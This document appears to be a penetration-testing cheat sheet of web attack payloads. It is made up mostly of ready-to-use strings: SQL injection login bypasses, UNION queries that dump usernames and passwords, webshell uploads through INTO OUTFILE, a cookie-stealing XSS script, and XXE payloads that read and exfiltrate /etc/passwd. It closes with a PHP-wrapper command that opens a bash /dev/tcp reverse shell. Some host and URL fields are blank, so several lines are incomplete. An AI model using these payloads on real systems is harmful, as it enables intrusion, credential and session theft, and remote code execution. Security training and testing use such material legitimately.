# Web footholds

# Poison Null Byte

A null byte tells many string parsers that a string is complete, allowing us to bypass extension filters.

# SQL injection

Bypass examples

' or 1=1--       # Use this when username is not known
foo@bar.com'--   # Use this when username is known

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1 --
' or 1=1 -- -

NOTE: it can also be helpful to see if any error messages show up by trying a single quote '

# Union Injection

A UNION injection is when UNION statement are added to the query allowing us to make a arbitrary queries and append the results to the intended query. We'll need to match the same number of columns, or it will error.

' UNION SELECT 1;-- -    # testing 1 columns     
' UNION SELECT 1,2;-- -  # testing 2 columns     

Examples of what the query look like on the server:

SELECT username from players where country = '[input]';                       # Typical query
SELECT username from players where country = '' UNION SELECT 1;-- -';         # Generic union injection testing 1 columns
SELECT username from players where country = '' UNION SELECT user();-- -';    # Select Database user

Upload webshell

' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" into OUTFILE '/var/www/html/webshell.php' -- -
' union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/webshell.php' -- -

Load file

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

# Oracle Union Injection

Run through ORDER BY expressions to see how many columns are available:

' order by 1--
' order by 2--
' order by 3--
' order by 4--
Something went wrong with the search: java.sql.SQLSyntaxErrorException: ORA-01785: ORDER BY item must be the number of a SELECT-list expression 

by doing this we determine that there is 3 columns.

' union select 1,2,3 from users--
' union select null,null,null from users--

# lets see which column we can get
' union select '1111',null,null from users--
1111 with title null from 0

# Ok the first column works, lets Oracle version
' union select (select banner from v$version where rownum=1),null,null from users--
Oracle Database 18c Express Edition Release - Production with title null from 0

# lets get tablenames
' union select table_name,null,null from all_tables--

# lets get column names
' union select column_name,null,null from all_tab_columns where table_name='users'--
PASSWORD with title null from 0
USER_ID with title null from 0
USER_NAME with title null from 0

# let's dump the tables by concatenating columns with '||'
' union select USER_NAME||PASSWORD,null,null from users--


# Stored XSS / session highjack

Stored XSS is the most dangerous type of XSS where a malicious string originates from the website’s database. Occurs when a website allows user input that is not sanitisedto be inserted into the database.

Use XSS to send cookie information to a server you control.

<script>new Image().src=""+document.cookie;</script>

# Reflected XSS

Payload is part of the victims request to the website and the website includes the payload in response back to the user. Examples

<script>alert(“Hello World”)</script>

# DOM-Based XSS

The structure of a website can be changed using this.

<script>document.querySelector('#title').textContent = 'I am a hacker'</script>


An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Synack has a great writeup about this: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/

# In bound examples

Display arbitrary text

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example "cookbook">]>

Reading a local file:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>

# Out of bound example

Note the &exfil; this must be included in the xml body somewhere for the attack to work.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!ENTITY % sp SYSTEM "">

On the attacking machine, fire up a simple web server python3 -m http.server 80 and craft a dtd file for use in the attack.

cat > dtd.xml   
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM ';'>">

look for GET requests on the simple sever, and decode the base64 containing exfiltrated data.

# Wordpress plugins

zip up a robust php file as a plugin. plugins are typically stores in the wp-content/plugins/ directory. So to execute your reverse shell after uploading browse to something like the following:


# LFI local File Inclusion

# php wrappers

PHP provides several protocol wrappers which can be used use to exploit directory traversal and local file inclusion vulnerabilities.,<?php echo shell_exec("ls") ?> 

curl -s --data "<?system('ls -la');?>" ""
curl -s --data "<?system('bash -i >& /dev/tcp/ 0>&1');?>" ""